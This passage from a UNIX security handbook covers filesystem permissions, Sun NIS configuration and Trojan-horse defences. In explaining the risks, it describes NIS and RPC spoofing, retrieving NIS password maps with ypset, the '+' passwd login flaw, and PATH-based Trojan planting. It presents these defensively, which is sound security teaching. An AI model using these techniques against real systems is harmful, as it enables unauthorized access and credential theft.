because a pathname represents the path to the entry from the root of the filesystem. By following this path, the system<br />

can find the inode of the referenced entry.<br />

Pathnames can be absolute or relative. Absolute pathnames always start at the root, and thus always begin with a "/",<br />

representing the root directory. Thus, a pathname such as /homes/mortimer/bin/crashmerepresents a pathname to an<br />

item starting at the root directory.<br />

A relative pathname always starts interpretation from the current directory of the process referencing the item. This<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_01.htm (3 of 8) [2002-04-12 10:44:14]


[Chapter 5] The <strong>UNIX</strong> Filesystem<br />

concept implies that every process has associated with it a current directory. Each process inherits its current directory<br />

from a parent process after a fork (see Appendix C, <strong>UNIX</strong> Processes). The current directory is initialized at login from<br />

the sixth field of the user record in the /etc/passwd file: the home directory. The current directory is then updated<br />

every time the process performs a change-directory operation (chdir or cd). Relative pathnames also imply that the<br />

current directory is at the front of the given pathname. Thus, after executing the command cd /usr, the relative<br />

pathname lib/makekey would actually be referencing the pathname /usr/lib/makekey. Note that any pathname that<br />

doesn't start with a "/" must be relative.<br />

5.1.4 Using the ls Command<br />

You can use the ls command to list all of the files in a directory. For instance, to list all the files in your current<br />

directory, type:<br />

% ls -a<br />

instructions letter notes<br />

invoice more-stuff stats<br />

%<br />

You can get a more detailed listing by using the ls -lF command:<br />

% ls -lF<br />

total 161 -rw-r--r-- 1 sian user 505 Feb 9 13:19 instructions<br />

-rw-r--r-- 1 sian user 3159 Feb 9 13:14 invoice<br />

-rw-r--r-- 1 sian user 6318 Feb 9 13:14 letter<br />

-rw------- 1 sian user 15897 Feb 9 13:20 more-stuff<br />

-rw-r----- 1 sian biochem 4320 Feb 9 13:20 notes<br />

-rwxr-xr-x 1 sian user 122880 Feb 9 13:26 stats*<br />

%<br />

The first line of output generated by the ls command ("total 161" in the example above) indicates the number of<br />

kilobytes taken up by the files in the directory.[6] Each of the other lines of output contains the fields, from left to<br />

right, as described in Table 5.1.<br />

[6] Some older versions of <strong>UNIX</strong> reported this in 512-byte blocks rather than in kilobytes.<br />

Table 5.1: ls Output<br />

Field Contents Meaning<br />

- The file's type; for regular files, this field is always a dash<br />

rw-r--r-- The file's permissions<br />

1 The number of "hard" links to the file; the number of "names" for the file<br />

sian The name of the file's owner<br />

user The name of the file's group<br />

505 The file's size, in bytes<br />

Feb 9 13:19 The file's modification time<br />

instructions The file's name<br />

The ls -F option makes it easier for you to understand the listing by printing a special character after the filename to<br />

indicate what it is, as shown in Table 5.2.<br />

Table 5.2: ls -F Tag Meanings<br />

Symbol Meaning<br />

(blank) Regular file or named pipe (FIFO[7])<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_01.htm (4 of 8) [2002-04-12 10:44:14]


[Chapter 5] The <strong>UNIX</strong> Filesystem<br />

* Executable program or command file<br />

/ Directory<br />

= Socket<br />

@ Symbolic link<br />

[7] A FIFO is a First-In, First-Out buffer, which is a special kind of named pipe.<br />

Thus, in the directory shown earlier, the file stats is an executable program file; the rest of the files are regular text<br />

files.<br />

The -g option to the ls command alters the output, depending on the version of <strong>UNIX</strong> being used.<br />

If you are using the Berkeley-derived version of ls,[8] you must use thels -g option to display the file's group in<br />

addition to the file's owner:<br />

[8] On Solaris systems, this program is named /usr/ucb/ls.<br />

% ls -lFg<br />

total 161<br />

-rw-r--r-- 1 sian user 505 Feb 9 13:19 instructions<br />

-rw-r--r-- 1 sian user 3159 Feb 9 13:14 invoice<br />

-rw-r--r-- 1 sian user 6318 Feb 9 13:14 letter<br />

-rw------- 1 sian user 15897 Feb 9 13:20 more-stuff<br />

-rw-r----- 1 sian biochem 4320 Feb 9 13:20 notes<br />

-rwxr-xr-x 1 sian user 122880 Feb 9 13:26 stats*<br />

%<br />

If you are using an AT&T-derived version of ls,[9] using the -g option causes the ls command to only display the file's<br />

group:<br />

[9] On Solaris systems, this program is named /bin/ls.<br />

% ls -lFg<br />

total 161<br />

-rw-r--r-- 1 user 505 Feb 9 13:19 instructions<br />

-rw-r--r-- 1 user 3159 Feb 9 13:14 invoice<br />

-rw-r--r-- 1 user 6318 Feb 9 13:14 letter<br />

-rw------- 1 user 15897 Feb 9 13:20 more-stuff<br />

-rw-r----- 1 biochem 4320 Feb 9 13:20 notes<br />

-rwxr-xr-x 1 user 122880 Feb 9 13:26 stats*<br />

%<br />

5.1.5 File Times<br />

The times shown with the ls -l command are the modification times of the files ( mtime). You can obtain the time of<br />

last access (the atime) by providing the -u option (for example, by typing ls -lu). Both of these time values can be<br />

changed with a call to a system library routine.[10] Therefore, as the system administrator, you should be in the habit<br />

of checking the inode change time ( ctime) by providing the -c option; for example, ls -lc. You can't reset the ctime of<br />

a file under normal circumstances. It is updated by the operating system whenever any change is made to the inode for<br />

the file.<br />

[10] utimes ( )<br />

Because the inode changes when the file is modified, ctime reflects the time of last writing, protection change, or<br />

change of owner. An attacker may change the mtime or atime of a file, but the ctime will usually be correct.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_01.htm (5 of 8) [2002-04-12 10:44:14]


Note that we said "usually." A clever attacker who gains superuser status can change the system clock and then touch<br />

the inode to force a misleading ctime on a file. Furthermore, an attacker can change the ctime by writing to the raw<br />

disk device and bypassing the operating system checks altogether. And if you are using Linux with the ext2<br />

filesystem, an attacker can modify the inode contents directly using the debugfs command.<br />

For this reason, if the superuser account on your system has been compromised, you should not assume that any of the<br />

three times stored with any file or directory are correct.<br />

NOTE: Some programs will change the ctime on a file without actually changing the file itself. This can<br />

be misleading when you are looking for suspicious activity. The file command is one such offender. The<br />

discrepancy occurs because file opens the file for reading to determine its type, thus changing the atime<br />

on the file. By default, most versions of file then reset the atime to its original value, but in so doing<br />

change the ctime. Some security scanning programs use the file program within them (or employ similar<br />

functionality), and this may result in wide-scale changes in ctime unless they are run on a read-only<br />

version of the filesystem.<br />

5.1.6 Understanding File Permissions<br />

The file permissions on each line of the ls listing tell you what the file is and what kind of file access (that is, ability to<br />

read, write, or execute) is granted to various users on your system.<br />

Here are two examples of file permissions:<br />

-rw-------<br />

drwxr-xr-x<br />

The first character of the file's mode field indicates the type of file described in Table 5.3.<br />

Table 5.3: File Types<br />

Contents Meaning<br />

- Plain file<br />

d Directory<br />

c Character device (tty or printer)<br />

b Block device (usually disk or CD-ROM)<br />

l Symbolic link (BSD or V.4)<br />

s Socket (BSD or V.4)<br />

= or p FIFO (System V, Linux)<br />

The next nine characters taken in groups of three indicate who on your computer can do what with the file. There are<br />

three kinds of permissions:<br />

r<br />

w<br />

x<br />

[Chapter 5] The <strong>UNIX</strong> Filesystem<br />

Permission to read<br />

Permission to write<br />

Permission to execute<br />

Similarly, there are three classes of permissions:<br />

owner<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_01.htm (6 of 8) [2002-04-12 10:44:14]


[Chapter 5] The <strong>UNIX</strong> Filesystem<br />

The file's owner<br />

group<br />

other<br />

Users who are in the file's group<br />

Everybody else on the system (except the superuser)<br />

In the ls -l command, privileges are illustrated graphically (see Figure 5.2).<br />

Figure 5.2: Basic permissions<br />

5.1.7 File Permissions in Detail<br />

The terms read, write, and execute have very specific meanings for files, as shown in Table 5.4.<br />

Table 5.4: File Permissions<br />

Character Permission Meaning<br />

r READ Read access means exactly that: you can open a file with the open() system call and you can<br />

read its contents with read.<br />

w WRITE Write access means that you can overwrite the file with a new one or modify its contents. It<br />

also means that you can use write() to make the file longer or truncate() or ftruncate() to make<br />

the file shorter.<br />

x EXECUTE Execute access makes sense only for programs. If a file has its execute bits set, you can run it<br />

by typing its pathname (or by running it with one of the family of exec() system calls). How<br />

the program gets executed depends on the first two bytes of the file.<br />

The first two bytes of an executable file are assumed to be a magic number indicating the<br />

nature of the file. Some numbers mean that the file is a certain kind of machine code file. The<br />

special two-byte sequence "#!" means that it is an executable script of some kind. Anything<br />

with an unknown value is assumed to be a shell script and is executed accordingly.<br />

File permissions apply to devices, named sockets, and FIFOS exactly as they do for regular files. If you have write<br />

access, you can write information to the file or other object; if you have read access, you can read from it; and if you<br />

don't have either access, you're out of luck.<br />

File permissions do not apply to symbolic links. Whether or not you can read the file pointed to by a symbolic link<br />

depends on the file's permissions, not the link's. In fact, symbolic links are almost always created with a file<br />

permission of "rwxrwxrwx" (or mode 0777, as explained later in this chapter) and are ignored by the operating<br />

system.[11]<br />

[11] Apparently, some vendors have found a use for the mode bits inside a symbolic link's inode. HP-UX<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_01.htm (7 of 8) [2002-04-12 10:44:14]


[Chapter 5] The <strong>UNIX</strong> Filesystem<br />

10.0 uses the sticky bit of symbolic links to indicate "transition links" - portability links to ease the<br />

transition from previous releases to the new SVR4 filesystem layout.<br />

Note the following facts about file permissions:<br />

●<br />

●<br />

●<br />

You can have execute access without having read access. In such a case, you can run a program without reading<br />

it. This ability is useful in case you wish to hide the function of a program. Another use is to allow people to<br />

execute a program without letting them make a copy of the program (see the note later in this section).<br />

If you have read access but not execute access, you can then make a copy of the file and run it for yourself. The<br />

copy, however, will be different in two important ways: it will have a different absolute pathname; and it will be<br />

owned by you, rather than by the original program's owner.<br />

On some versions of <strong>UNIX</strong> (including Linux), an executable command script must have both its read and<br />

execute bits set to allow people to run it.<br />

Most people think that file permissions are pretty basic stuff. Nevertheless, many <strong>UNIX</strong> systems have had security<br />

breaches because their file permissions are not properly set.<br />

NOTE: Sun's Network Filesystem (NFS) servers allow a client to read any file that has either the read or<br />

the execute permission set. They do so because there is no difference, from the NFS server's point of<br />

view, between a request to read the contents of a file by a user who is using the read() system call and a<br />

request to execute the file by a user who is using the exec() system call. In both cases, the contents of the<br />

file need to be transferred from the NFS server to the NFS client. (For a detailed description, see Chapter<br />

20, NFS.)<br />

4.4 Summary 5.2 Using File Permissions<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_01.htm (8 of 8) [2002-04-12 10:44:14]


[Chapter 19] 19.4 Sun's Network Information Service (NIS)<br />

Chapter 19<br />

RPC, NIS, NIS+, and Kerberos<br />

19.4 Sun's Network Information Service (NIS)<br />

Sun's Network Information Service (NIS) is a distributed database system that lets many computers share password files,<br />

group files, host tables, and other files over the network. Although the files appear to be available on every computer, they<br />

are actually stored on only a single computer, called the NIS master server (and possibly replicated on a backup, or slave<br />

server). The other computers on the network, NIS clients, can use the databases stored on the master server (like<br />

/etc/passwd) as if they were stored locally. These databases are called NIS maps.<br />

With NIS, a large network can be managed more easily because all of the account and configuration information (such as<br />

/etc/passwd file) needs to be stored on only a single machine.<br />

Some files are replaced by their NIS maps. Other files are augmented. For these files, NIS uses the plus sign ( +) to tell the<br />

system that it should stop reading the file (e.g., /etc/passwd) and should start reading the appropriate map (e.g., passwd).<br />

The plus sign tells the <strong>UNIX</strong> programs that scan that database file to ask the NIS server for the remainder of the file. The<br />

server retrieves this information from the NIS map. The server maintains multiple maps; these maps normally correspond<br />

to files stored in the /etc directory such as /etc/passwd, /etc/hosts, and /etc/services. This structure is shown in Figure 19.1.<br />

For example, the /etc/passwd file on a client might look like this:<br />

root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh<br />

+::0:0:::<br />

This causes the program reading /etc/passwd on the client to make a network request to read the passwd map on the server.<br />

Normally, the passwd map is built from the server's /etc/passwd file, although this need not necessarily be the case.<br />

Figure 19.1: How NIS works<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_04.htm (1 of 7) [2002-04-12 10:44:15]


[Chapter 19] 19.4 Sun's Network Information Service (NIS)<br />

19.4.1 Including or excluding specific accounts:<br />

You can restrict the importing of accounts to particular users by following the "+" symbol with a particular username. For<br />

example, to include only the user george from your NIS server, you could use the following entry in your /etc/passwd file:<br />

root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh<br />

+george::120:5:::<br />

Note that we have included george's UID and GID. You must include the UID so that the function getpwuid() will work<br />

properly. However, getpwuid() actually goes to the NIS map and overrides the UID and GID values that you specify.<br />

You can also exclude certain usernames from being imported by inserting a line that begins with a minus sign. When NIS<br />

is scanning the /etc/passwd file, it will stop when it finds the first line that matches. Therefore, if you wish to exclude a<br />

specific account but include others that are on the server, you must place the lines beginning with the minus sign before the<br />

lines beginning with the "+" symbol.<br />

For example, to exclude zachary's account and to include the others from the server, you might use the following<br />

/etc/passwd file:<br />

root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh<br />

-zachary:::2001:102::<br />

+::0:0:::<br />

Note again that we have included zachary's UID and GID.<br />

19.4.2 Importing accounts without really importing accounts<br />

NIS allows you to selectively import some fields from the /etc/passwd database but not others. For example, if you have<br />

the following entry in your /etc/passwd file:<br />

root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh<br />

+:*:0:0:::<br />

Then all of the entries in the NIS passwd map will be imported, but each will have its password entry changed to *,<br />

effectively preventing it from being used on the client machine.<br />

Why might you want to do that? Well, by importing the entire map, you get all the UIDS and account names, so that ls -l<br />

invocations show the owner of files and directories as usernames. The entry also allows the ~user notation in the various<br />

shells to correctly map to the user's home directory (assuming that it is mounted using NFS).<br />

19.4.3 NIS Domains<br />

When you configure an NIS server, you must specify an NIS domain. These domains are not the same as DNS domains.<br />

While DNS domains specify a region of the <strong>Internet</strong>, NIS domains specify an administrative group of machines.<br />

The <strong>UNIX</strong> domainname command is used to display and to change your domainname. Without an argument, the command<br />

prints the current domain:<br />

% domainname<br />

EXPERT<br />

%<br />

You can specify an argument to change your domain:<br />

# domainname BAR-BAZ<br />

#<br />

Note that you must be the superuser to set your computer's domain. Under Solaris 2.x, the computer's domainname is<br />

stored in the file /etc/defaultdomain, and set automatically on system startup by the shell script /etc/rc2.d/S69inet. A<br />

computer can only be in one NIS domain at a time, but it can serve any number of NIS domains.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_04.htm (2 of 7) [2002-04-12 10:44:15]


[Chapter 19] 19.4 Sun's Network Information Service (NIS)<br />

NOTE: Although you might be tempted to use your <strong>Internet</strong> domain as your netgroup domain, we strongly<br />

recommend against this. Setting the two domains to the same name has caused problems with some versions<br />

of sendmail. It is also a security problem to use an NIS domain that can be easily guessed. Hacker toolkits that<br />

attempt to exploit NIS or NFS bugs almost always try variations of the <strong>Internet</strong> domainname as the NIS<br />

domainname before trying anything else. (Of course, the domainname can still be determined in other ways.)<br />

19.4.4 NIS Netgroups<br />

NIS netgroups allow you to create groups for users or machines on your network. Netgroups are similar in principle to<br />

<strong>UNIX</strong> groups for users, but they are much more complicated.<br />

The primary purpose of netgroups is to simplify your configuration files, and to give you less opportunity to make a<br />

mistake. By properly specifying and using netgroups, you can increase the security of your system by limiting the<br />

individuals and the machines that have access to critical resources.<br />

The netgroup database is kept on the NIS master server in the file /etc/netgroup or /usr/etc/netgroup. This file consists of<br />

one or more lines that have the form:<br />

groupname member1 member2 ...<br />

Each member can specify a host, a user, and a NIS domain. The members have the form:<br />

(hostname, username, domainname)<br />

If a username is not included, then every user at the host hostname is a member of the group. If a domainname is not<br />

provided, then the current domain is assumed.[11]<br />

[11] It is generally a dangerous practice to create netgroups with both users and hosts; doing so makes<br />

mistakes somewhat more likely.<br />

Here are some sample netgroups:<br />

Profs (cs,bruno,hutch) (cs,art,hutch)<br />

This statement creates a netgroup called Profs, which is defined to be the users bruno and art on the machine cs in<br />

the domain hutch.<br />

Servers (oreo,,) (choco,,) (blueberry,,)<br />

This statement creates a netgroup called Servers, which matches any user on the machines oreo, choco, or blueberry.<br />

Karen_g (,karen,)<br />

This statement creates a netgroup called Karen_g which matches the user karen on any machine.<br />

Universal(,,,)<br />

This statement creates the Universal netgroup, which matches anybody on any machine.<br />

MachinesOnly ( , - , )<br />

This statement creates a netgroup that matches all hostnames in the current domain, but which has no user entries. In<br />

this case, the minus sign is used as a negative wildcard.<br />

19.4.4.1 Setting up netgroups<br />

The /etc/yp/makedbm program (sometimes found in /usr/etc/yp/makedbm) processes the netgroup file into a number of<br />

database files that are stored in the files:<br />

/etc/yp/domainname/netgroup.dir<br />

/etc/yp/domainname/netgroup.pag<br />

/etc/yp/domainname/netgroup.byuser.dir<br />

/etc/yp/domainname/netgroup.byuser.pag<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_04.htm (3 of 7) [2002-04-12 10:44:15]


[Chapter 19] 19.4 Sun's Network Information Service (NIS)<br />

/etc/yp/domainname/netgroup.byhost.dir<br />

/etc/yp/domainname/netgroup.byhost.pag<br />

Note that /etc/yp may be symbolically linked to /var/yp on some machines.<br />

If you have a small organization, you might simply create two netgroups: one for all of your users, and a second for all of<br />

your client machines. These groups will simplify the creation and administration of your system's configuration files.<br />

If you have a larger organization, you might create several groups. For example, you might create a group for each<br />

department's users. You could then have a master group that consists of all of the subgroups. Of course, you could do the<br />

same for your computers as well.<br />

Consider the following science department:<br />

Math (mathserve,,) (math1,,) (math2,,) (math3,,)<br />

Chemistry (chemserve1,,) (chemserve2,,) (chem1,,) (chem2,,) (chem3,,)<br />

Biology (bioserve1,,) (bio1,,) (bio2,,) (bio3,,)<br />

Science Math Chemistry Biology<br />

Netgroups are important for security because you use them to limit which users or machines on the network can access<br />

information stored on your computer. You can use netgroups in NFS files to limit who has access to the partitions, and in<br />

data files such as /etc/passwd, to limit which entries are imported into a system.<br />

19.4.4.2 Using netgroups to limit the importing of accounts<br />

You can use the netgroups facility to control which accounts are imported by the file /etc/passwd. For example, if you<br />

want to simply import accounts for a specific netgroup, then follow the plus sign (+) with an at sign (@) and a netgroup:<br />

root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh +@operators::0:0:::<br />

The above will bring in the NIS password map entry for the users listed in the operators group.<br />

You can also exclude users or groups if you list the exclusions before you list the netgroups. For example:<br />

root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh -george::120:5::: -@suspects::0:0:::<br />

+::0:0:::<br />

The above will include all NIS password map entries except for user george and any users in the suspects netgroup.<br />

NOTE: The +@netgroup and -@netgroup notation does not work on all versions of NIS, and does not work<br />

reliably on others. If you intend to use these features, check your system to verify that they are behaving as<br />

expected. Simply reading your documentation is not sufficient.<br />

19.4.4.3 Limitations with NIS<br />

NIS has been the starting point for many successful penetrations into <strong>UNIX</strong> networks. Because NIS controls user accounts,<br />

if you can convince an NIS server to broadcast that you have an account, you can use that fictitious account to break into a<br />

client on the network. NIS can also make confidential information, such as encrypted password entries, widely available.<br />

19.4.4.4 Spoofing RPC<br />

There are design flaws in the code of the NIS implementations of several vendors that allow a user to reconfigure and<br />

spoof the NIS system. This spoofing can be done in two ways: by spoofing the underlying RPC system, and by spoofing<br />

NIS.<br />

The NIS system depends on the functioning of the portmap service. This is a daemon that matches supplied service names<br />

for RPC with IP port numbers at which those services can be contacted. Servers using RPC will register themselves with<br />

portmap when they start, and will remove themselves from the portmap database when they exit or reconfigure.<br />

Early versions of portmap allowed any program to register itself as an RPC server, allowing attackers to register their own<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_04.htm (4 of 7) [2002-04-12 10:44:15]


[Chapter 19] 19.4 Sun's Network Information Service (NIS)<br />

NIS servers and respond to requests with their own password files. Sun's current version of portmap rejects requests to<br />

register or delete services if they come from a remote machine, or if they refer to a privileged port and come from a<br />

connection initiated from a nonprivileged port. Thus, in Sun's current version, only the superuser can make requests that<br />

add or delete service mappings to privileged ports, and all requests can only be made locally. However, not every vendor's<br />

version of the portmap daemon performs these checks. The result is that an attacker might be able to replace critical RPC<br />

services with his own, booby-trapped versions.<br />

Note that NFS and some NIS services often register on unprivileged ports, even in SunOS. In theory, even with the checks<br />

outlined above, an attacker could replace one of these services with a specially written program that would respond to<br />

system requests in a way that would compromise system security. This would require some in-depth understanding of the<br />

protocols and relationships of the programs, but these are well-documented and widely known.<br />

19.4.4.5 Spoofing NIS<br />

NIS clients get information from a NIS server through RPC calls. A local daemon, ypbind, caches contact information for<br />

the appropriate NIS server daemon, ypserv. The ypserv daemon may be local or remote.<br />

Under early SunOS versions of the NIS service (and current versions by some vendors), it was possible to instantiate a<br />

program that acted like ypserv and responded to ypbind requests. The local ypbind daemon could then be instructed to use<br />

that program instead of the real ypserv daemon. As a result, an attacker could supply his or her own version of the<br />

password file (for instance) to a login request! (The security implications of this should be obvious.)<br />

Current NIS implementations of ypbind have a -secure command line flag[12] that can be provided when the daemon is<br />

started. If the flag is used, the ypbind daemon will not accept any information from a ypserv server that is not running on a<br />

privileged port. Thus, a user-supplied attempt to masquerade as the ypserv daemon will be ignored. A user can't spoof<br />

ypserv unless that user already has superuser privileges. In practice, there is no good reason not to use the -secure flag.<br />

[12] Perhaps present as simply -s.<br />

Unfortunately, the -secure flag has a flaw. If the attacker is able to subvert the root account on a machine on the local<br />

network and start a version of ypserv using his own NIS information, he need only point the target ypbind daemon to that<br />

server. The compromised server would be running on a privileged port, so its responses would not be rejected. The ypbind<br />

process would therefore accept its information as valid, and the security could be compromised.<br />

An attacker could also write a "fake" ypserv that runs on a PC-based system. Privileged ports have no meaning in this<br />

context, so the fake server could feed any information to the target ypbind process.<br />

19.4.4.6 NIS is confused about "+"<br />

A combination of installation mistakes and changes in NIS itself has caused some confusion with respect to the NIS plus<br />

sign (+) in the /etc/passwd file.<br />

If you use NIS, be very careful that the plus sign is in the /etc/passwd file of your clients, and not your servers. On a NIS<br />

server, the plus sign can be interpreted as a username under some versions of the <strong>UNIX</strong> operating system. The simplest<br />

way to avoid this problem is to make sure that you do not have the "+" account on your NIS server.<br />

Attempting to figure out what to put on your client machine is another matter. With early versions of NIS, the following<br />

line was distributed:<br />

+::0:0::: Correct on SunOS and Solaris<br />

Unfortunately, this line presented a problem. When NIS was not running, the plus sign was sometimes taken as an account<br />

name, and anybody could log into the computer by typing + at the login: prompt. Even worse: the person logged in with<br />

superuser privileges!<br />

One way to minimize the danger was by including a password field for the plus user. Specify the plus sign line in the form:<br />

+:*:0:0::: On NIS clients only<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_04.htm (5 of 7) [2002-04-12 10:44:15]


[Chapter 19] 19.4 Sun's Network Information Service (NIS)<br />

Unfortunately, this entry actually means "import the passwd map, but change all of the encrypted passwords to * which<br />

effectively prevents everybody from logging in. This entry wasn't right either!<br />

The easiest way to deal with this confusion is simply to attempt to log into your NIS clients and servers using a + as a<br />

username. You may also wish to try logging in with the network cable unplugged, to simulate what happens to your<br />

computer when the NIS server cannot be reached. In either case, you should not be able to log in by simply typing + as a<br />

username. This approach will tell you that your server is properly configured.<br />

If you see the following example, you have no problem:<br />

login: +<br />

password: anything<br />

Login incorrect<br />

If you see the following example, you do have a problem:<br />

login: +<br />

Last login: Sat Aug 18 16:11 32 on ttya<br />

#<br />

NOTE: If you are running a recent version of your operating system, do not think that your system is immune<br />

to the + confusion in the NIS subsystem. In particular, some recent versions of Linux got this wrong too.<br />

19.4.5 Unintended Disclosure of Site Information with NIS<br />

Because NIS has relatively weak security, it can unintentionally disclose information about your site to attackers. In<br />

particular, NIS can disclose encrypted passwords, usernames, hostnames and their IP addresses, and mail aliases.<br />

Unless you protect your NIS server with a firewall or with a modified portmap process, anyone on the outside of your<br />

system can obtain copies of the databases exported by your NIS server. To do this, all the outsider needs to do is guess the<br />

name of your NIS domain, bind to your NIS server using the ypset command, and request the databases. This can result in<br />

the disclosure of your distributed password file, and all the other information contained in your NIS databases.<br />

There are several ways to prevent unauthorized disclosure of your NIS databases:<br />

1.<br />

2.<br />

3.<br />

4.<br />

The simplest is to protect your site with a firewall, or at least a smart router, and not allow the UDP packets<br />

associated with RPC to cross between your internal network and the outside world. Unfortunately, because RPC is<br />

based on the portmapper, the actual UDP port that is used is not fixed. In practice, the only safe strategy is to block<br />

all UDP packets except those that you specifically wish to let cross.<br />

Another approach is to use Wietse Venema's freely available portmapper program, which allows you to specify a list<br />

of computers by hostname or IP address that should be allowed or denied access to specific RPC servers.[13] See<br />

Chapter 21, Firewalls, and Chapter 22, Wrappers and Proxies, for information on how to do this.<br />

[13] This same functionality is built into many vendor versions, but you need to read the documentation<br />

carefully to find how to use it. It is usually turned off by default. On Sun systems, this involves editing<br />

the /var/yp/securenets file, and on HP machines it is the /etc/inetd.sec file.<br />

Some versions of NIS support the use of the /var/yp/securenets file for NIS servers. This file, when present, can be<br />

used to specify a list of networks that may receive NIS information.<br />

Don't tighten up NIS but forget about DNS! If you decide that outsiders should not be able to learn your site's IP<br />

addresses, be sure to run two nameservers, one for internal use and one for external use.<br />

19.3 <strong>Sec</strong>ure RPC<br />

(AUTH_DES)<br />

19.5 Sun's NIS+<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_04.htm (6 of 7) [2002-04-12 10:44:15]


[Chapter 19] 19.4 Sun's Network Information Service (NIS)<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_04.htm (7 of 7) [2002-04-12 10:44:15]


[Chapter 11] 11.5 Protecting Yourself<br />

Chapter 11<br />

Protecting Against Programmed<br />

Threats<br />

11.5 Protecting Yourself<br />

The types of programmed threats you are most likely to encounter in the <strong>UNIX</strong> environment are Trojan horses and back doors. In<br />

part, this is because writing effective worms and viruses is difficult; also, attackers do not intend outright damage to your system.<br />

Instead, they use Trojan horses or back doors to gain (or regain) additional access to your system. If damage is a goal, obtaining<br />

superuser access is usually a first step in the process.<br />

Some of the features that give <strong>UNIX</strong> flexibility and power also enable attackers to craft workable Trojan horse or back door schemes.<br />

In general, attacks come in one of the following forms:<br />

●<br />

●<br />

●<br />

●<br />

Altering the expected behavior of the shell (command interpreter)<br />

Abusing some form of start-up mechanism<br />

Subverting some form of automatic mechanism<br />

Exploiting unexpected interactions<br />

All of these plans are designed basically to get a privileged user or account to execute commands that would not normally be<br />

executed. For example, one very common Trojan horse is a program named su that, instead of making you the superuser, sends a<br />

copy of the superuser password to an account at another computer.<br />

To protect your system effectively, you need to know how these attacks work. By understanding the methods of attack, you can then<br />

be aware of how to prevent them.<br />

An equally important part of protecting yourself is to run a secure system in general. Normal computer security procedures will<br />

protect your system against both programmed threats and malicious users.<br />

11.5.1 Shell Features<br />

The shells (csh, sh, ksh, tcsh, and others) provide users with a number of shortcuts and conveniences. Among these features is a<br />

complete programming language with variables. Some of these variables govern the behavior of the shell itself. If an attacker is able<br />

to subvert the way the shell of a privileged user works, the attacker can often get the user (or a background task) to execute a task for<br />

him.<br />

There are a variety of common attacks using features of the shell to compromise security. These are described in the following<br />

sections.<br />

11.5.1.1 PATH attacks<br />

Each shell maintains a path, consisting of a set of directories to be searched for commands issued by the user. This set of directories<br />

is consulted, one at a time, when the user types a command whose name does not contain a / symbol, and which does not bind to an<br />

internal shell command name or alias.<br />

In the Bourne and Korn shells, the PATH variable is normally set within the initialization file. The list of directories given normally<br />

consists of directories, separated by a colon (:). An entry of only a period, or an empty entry,[4] means to search the current directory.<br />

The csh path is initialized by setting the variable PATH with a list of space-separated directory names enclosed in parentheses.<br />

[4] In a POSIX system, a null entry does not translate to the current directory; an explicit dot must be used.<br />

For instance, the following are typical initializations that have vulnerabilities:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_05.htm (1 of 9) [2002-04-12 10:44:16]


[Chapter 11] 11.5 Protecting Yourself<br />

PATH=.:/usr/bin:/bin:/usr/local/bin sh or ksh<br />

set path = ( . /usr/bin /bin /usr/local/bin) csh<br />

In the above, each command sets the search path to look first in the current directory, then in /usr/bin, then in /bin, and then in<br />

/usr/local/bin. This is a poor choice of settings, especially if the user has special privileges. The current directory, as designated by a<br />

null directory or period, should never be included in the search path. To illustrate the danger of placing the current directory in your<br />

path, see the example given in "Stealing Superuser" in Chapter 4, Users, Groups, and the Superuser.<br />

You should also avoid this sort of initialization, which also places the current directory in your search path:<br />

Incorrect:<br />

PATH=:/usr/bin:/bin:/usr/local/bin: sh or ksh<br />

Correct:<br />

PATH= /usr/bin:/bin:/usr/local/bin sh or ksh<br />

The colons (:) should only be used as delimiters, not as end caps.<br />

No sensitive account should ever have the current directory in its search path.[5] This rule is especially true of the superuser account!<br />

More generally, you should never have a directory in your search path that is writable by other users. Some sites keep a special<br />

directory, such as /usr/local/bin/, world-writable (mode 777) so that users can install programs for the benefit of others.<br />

Unfortunately, this practice opens up the entire system to the sort of attacks outlined earlier.<br />

[5] We would argue that no account should have the current directory in its search path, but we understand how difficult<br />

this practice would be to enforce.<br />

Putting the current directory last in the search path is also not a good idea. For instance, if you use the more command frequently, but<br />

sometimes type mroe, the attacker can take advantage of this by placing a Trojan horse named mroe in this directory. It may be many<br />

weeks or months before the command is accidentally executed. However, when the command is executed, your security will be<br />

penetrated.<br />

We strongly recommend that you get into the habit of typing the full pathname of commands when you are running as root. For<br />

example, instead of only typing chown, type /etc/chown to be sure you are getting the system version! This may seem like extra<br />

work, but when you are running as root, you also bear extra responsibility.<br />

If you create any shell files that will be run by a privileged user - including root, uucp, bin, etc. - get in the habit of resetting the<br />

PATH variable as one of the first things you do in each shell file. The PATH should include only sensible, protected directories. This<br />

method is discussed further in Chapter 23, Writing <strong>Sec</strong>ure SUID and Network Programs.<br />

11.5.1.2 IFS attacks<br />

